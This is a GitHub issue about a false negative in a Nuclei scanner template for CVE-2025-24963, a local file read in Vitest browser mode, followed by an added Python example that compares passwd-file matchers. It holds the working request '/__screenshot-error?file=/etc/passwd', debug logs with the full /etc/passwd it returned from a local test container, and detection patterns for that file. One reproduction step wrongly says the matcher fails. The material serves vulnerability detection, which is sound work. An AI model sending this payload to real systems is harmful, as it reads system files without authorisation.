[FALSE-NEGATIVE]: CVE-2025-24963 on Linux Targets (Ubuntu/Debian) due to strict /etc/passwd matching #15205

@omarkurt

Template IDs or paths

http/cves/2025/CVE-2025-24963.yaml

Environment

- OS: MacOS
- Nuclei: v3.5.1
- Go: go1.25.5

Steps To Reproduce

I noticed that the current Nuclei template for CVE-2025-24963 uses a pretty strict matcher for /etc/passwd. It expects the root user's password field to be :*::

- "contains_all(body,'root',':*:','/bin/')"

This works perfectly on BSD and macOS systems where the password field is usually *. But on modern Linux distros (like Ubuntu, Debian, CentOS) that use shadow passwords, that field is actually an x (like root:x:0:0:...).

So, when scanning a vulnerable Linux-based target, we end up getting a False Negative, which might give a false sense of security.

I noticed this while dockerizing the application as a Vulnerable Target (VT) and conducting some experiments. The detailed differences are listed below.

- "contains_all(body,'root',':*:','/bin/') || contains_all(body,'root',':x:','/bin/')"

Reproduction with Original Nuclei Template

  1. Set up a vulnerable environment with VT using the official Docker image (which is Ubuntu-based) or any standard Linux server.
  2. Run the current template CVE-2025-24963.yaml.
  3. The server responds with 200 OK and the /etc/passwd content, but the matcher fails because it doesn't find :*: in the body.

```
root@vulnerabletarget % nuclei -t CVE-2025-24963.yaml -u http://localhost:63315/ -vv --debug
...

[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 457
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-24963] Vitest Browser Mode - Local File Read (@iamnoooob,@rootxharsh,@pdresearch) [medium]
[INF] [CVE-2025-24963] Dumped HTTP request for http://localhost:63315/__screenshot-error?file=/etc/passwd

GET /__screenshot-error?file=/etc/passwd HTTP/1.1
Host: localhost:63315
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.19
Connection: close
Accept: */*
Accept-Encoding: gzip

[DBG] [CVE-2025-24963] Dumped HTTP response http://localhost:63315/__screenshot-error?file=/etc/passwd

HTTP/1.1 200 OK
Connection: close
Content-Length: 1185
Cache-Control: public,max-age=0,must-revalidate
Content-Type: image/png
Date: Fri, 06 Feb 2026 18:58:14 GMT

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
pwuser:x:1000:1000:,,,:/home/pwuser:/bin/bash
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:105::/nonexistent:/usr/sbin/nologin
[INF] Scan completed in 6.108375ms. No results found.
```

Reproduction with Changed Template for VT

  1. Set up a vulnerable environment with VT using the official Docker image (which is Ubuntu-based) or any standard Linux server.
  2. Run the current template [vt-2025-24963.nuclei.yaml](https://github.com/HappyHackingSpace/vt-templates/blob/main/cves/vt-2025-24963/vt-2025-24963.nuclei.yaml).
  3. The server responds with 200 OK and the /etc/passwd content, but the matcher fails because it doesn't find :*: in the body.

```
root@vulnerabletarget % nuclei -t vt-2025-24963.nuclei.yaml -u http://localhost:63315/ -vv --debug
...

[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 457
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [vt-2025-24963] Dumped HTTP request for http://localhost:63315/__screenshot-error?file=/etc/passwd

GET /__screenshot-error?file=/etc/passwd HTTP/1.1
Host: localhost:63315
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

[DBG] [vt-2025-24963] Dumped HTTP response http://localhost:63315/__screenshot-error?file=/etc/passwd

HTTP/1.1 200 OK
Connection: close
Content-Length: 1185
Cache-Control: public,max-age=0,must-revalidate
Content-Type: image/png
Date: Fri, 06 Feb 2026 19:03:10 GMT

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
pwuser:x:1000:1000:,,,:/home/pwuser:/bin/bash
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:105::/nonexistent:/usr/sbin/nologin
[vt-2025-24963:dsl-1] [http] [medium] http://localhost:63315/__screenshot-error?file=/etc/passwd
[INF] Scan completed in 65.84575ms. 1 matches found.
```

Note

I found this solution on the VT side. It seems more appropriate than modifying contains_all. contains_all is used in over 500 templates, so similar issues might exist in other templates as well.

Relevant dumped responses

Anything else?

No response
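
An added example (not code from this issue or from the nuclei-templates project) that runs the original matcher, the widened `||` matcher, and a line-anchored regex against constructed response bodies. `contains_all` is emulated in Python on the assumption that it means "every substring occurs in the body", and the regex goes beyond the two cases in the report by accepting any value in the password field.

```python
import re

# Constructed sample bodies (illustrative, not captured from a real host).
SAMPLES = {
    "linux_shadow": "root:x:0:0:root:/root:/bin/bash\n"
                    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n",
    "bsd_style": "root:*:0:0:System Administrator:/var/root:/bin/sh\n"
                 "daemon:*:1:1:System Services:/var/root:/usr/bin/false\n",
    "empty_field": "root::0:0:root:/root:/bin/sh\n",
    # Ordinary page that happens to contain all three literals.
    "not_passwd": "<p>Log in as root, use host:x:port syntax, shell is /bin/sh</p>",
}

def contains_all(body, *needles):
    """Python emulation (assumed semantics): true if every substring is in body."""
    return all(n in body for n in needles)

def original_matcher(body):
    # Matcher quoted in the issue: only the '*' password placeholder.
    return contains_all(body, "root", ":*:", "/bin/")

def widened_matcher(body):
    # Variant quoted in the issue: '*' or the shadow placeholder 'x'.
    return original_matcher(body) or contains_all(body, "root", ":x:", "/bin/")

# Anchors on the structure of the root entry: name, any password field
# without a colon, then UID 0 and GID 0, at the start of a line.
ROOT_ENTRY = re.compile(r"^root:[^:\n]*:0:0:", re.MULTILINE)

def regex_matcher(body):
    return ROOT_ENTRY.search(body) is not None

def evaluate():
    """Return {sample: {matcher: bool}} for every sample/matcher pair."""
    matchers = {
        "original": original_matcher,
        "widened": widened_matcher,
        "regex": regex_matcher,
    }
    return {
        name: {m: fn(body) for m, fn in matchers.items()}
        for name, body in SAMPLES.items()
    }

if __name__ == "__main__":
    for name, row in evaluate().items():
        print(f"{name:13} " + "  ".join(f"{m}={v}" for m, v in row.items()))
```

The `not_passwd` row shows that independent substring checks can also fire on unrelated content, which a structural match on the `root` entry avoids.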

Metadata

Labels

false-negative: Nuclei template missing valid results
